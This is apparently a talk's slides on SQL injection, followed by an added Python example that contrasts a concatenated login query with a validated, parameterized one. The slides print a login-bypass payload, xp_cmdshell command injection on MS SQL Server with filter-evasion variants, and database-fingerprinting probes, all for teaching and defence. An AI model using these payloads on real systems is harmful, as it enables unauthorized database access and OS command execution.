The session describes some advanced SQL injection techniques
How Did I Steal Your Database
Mostafa Siraj
@mostafasiraj

Agenda
Noooo, it kills suspense

DISCLAIMER
Hacking websites is ILLEGAL
This presentation is meant for educational purposes ONLY
Only use this stuff on YOUR website and YOUR account

SQL Injection
What is it?
The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.

SQL Injection Example, Bypassing Logon
- Original SQL query (the user-supplied values are concatenated straight into the query string):
  String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'";
  .....
- Setting username to Mostafa and password to ' OR '1'='1 produces:
  SELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1'
- The attacker is logged on without authentication.
- Not only your web app and DB are at risk:
  - Depending on the DB, an attacker can access the operating system.

MS SQL Server: Execute OS command xp_cmdshell
- Setting username to '; exec master.dbo.xp_cmdshell "dir";-- produces:
  SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --
  Note: dir lists directory contents.

Let's play Hide and Seek
Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --
Defender: Disallow double quotes.
Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; --
Defender: Filter out the string "xp_cmdshell".
Attacker: ';declare @a varchar(1000);
set @a = 'master.dbo.xp_' + 'cmdshell dir';
exec (@a);--
Defender: Filter out "xp", "cmd", "shell", ...
Attacker: ';declare @a varchar(1000);
set @a = reverse('rid llehsdmc_px.obd.retsam');
exec (@a);--

Finding SQL Injection Bugs

Finding SQL Injection Bugs
- Submit a single quotation mark and observe the result.
- Submit two single quotation marks and observe the result.
- Identify the database, e.g. by the string concatenation syntax it accepts:
  Oracle: '||'FOO
  MS-SQL: '+'FOO
  MySQL: ' 'FOO [note the space between the two quotes]

Finding SQL Injection Bugs
- For multistage processes, complete all the stages before observing the results.
- For search fields, try using the wildcard character %.
- For numeric data, if the original value was 2, try submitting 1+1 or 3-1.
- If successful, try using SQL-specific keywords, e.g. 67-ASCII('A').
- If single quotes are filtered, try 51-ASCII(1) [note ASCII(1)=49].

Inject into different statement types
- You can do the same for all SQL statements (INSERT, UPDATE or DELETE).
- Watch out when injecting in UPDATE or DELETE.

Demo
WebGoat

Demo
HacmeBank

Demo
Using UNION Operator

Demo
MS-SQL Error

Solution
- Validate the input (accept only known good).
- Process SQL queries using prepared statements, parameterized queries, or stored procedures.
- Enforce least privilege.
- Avoid detailed error messages.
- Show care when using stored procedures (e.g. exec).

Thank You
@mostafasiraj
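An added example, not the presentation's own code, showing the first two points of the Solution slide applied to the logon query from the bypass example: the concatenated query beside an allowlist-validated, parameterized version. It assumes sqlite3 as the database; the table, user and password are constructed for the demo.

```python
import re
import sqlite3

# Constructed sample database: one user with a known password (demo only).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE user (name TEXT, pass TEXT)")
conn.execute("INSERT INTO user VALUES ('Mostafa', 's3cret')")
conn.commit()

# Allowlist for the username field: "accept only known good" from the slides.
# Quotes, semicolons and spaces are simply not valid usernames here.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def login_vulnerable(username, password):
    """Builds the query by string concatenation, like the slide's Java code.

    Returns True when a row matches. A password of  ' OR '1'='1  turns the
    WHERE clause into  pass='' OR '1'='1'  and every row matches.
    """
    sql = ("SELECT * FROM user WHERE name = '" + username
           + "' AND pass='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(username, password):
    """Validates the username, then binds both values as parameters.

    The driver sends the values separately from the SQL text, so a quote or
    a semicolon in the input is compared as data and never parsed as SQL.
    """
    if not USERNAME_RE.match(username):
        return False
    sql = "SELECT * FROM user WHERE name = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    bypass = "' OR '1'='1"
    print("vulnerable, bypass password:", login_vulnerable("Mostafa", bypass))
    print("safe, bypass password:      ", login_safe("Mostafa", bypass))
    print("safe, real password:        ", login_safe("Mostafa", "s3cret"))
```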